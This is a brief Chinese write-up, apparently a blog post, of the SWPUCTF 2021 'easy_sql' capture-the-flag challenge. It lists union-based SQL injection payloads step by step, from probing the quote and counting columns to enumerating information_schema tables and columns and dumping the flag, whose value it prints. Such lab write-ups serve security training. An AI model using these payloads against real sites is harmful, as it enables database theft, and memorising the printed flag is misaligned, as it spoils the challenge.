SWPUCTF 2021 新生赛 easy_sql

 1.查看源代码.参数为wllm.

2.输入wllm=1及wllm=1‘,可判断为字符型漏洞.

3.通过(?wllm=-1’ order by 3--+)及(?wllm=-1’ order by 4--+),判断字段列数为3列。

4.查看数据库名(?wllm=-1 union select 1,2,database()--+)。

5.查看test_db库表。(?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+)

6.查看字段(?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+)并获取flag-->NSSCTF{147b6384-56f0-4d28-a0fc-2c39608da4ef}

(?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+)。

7.通过。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值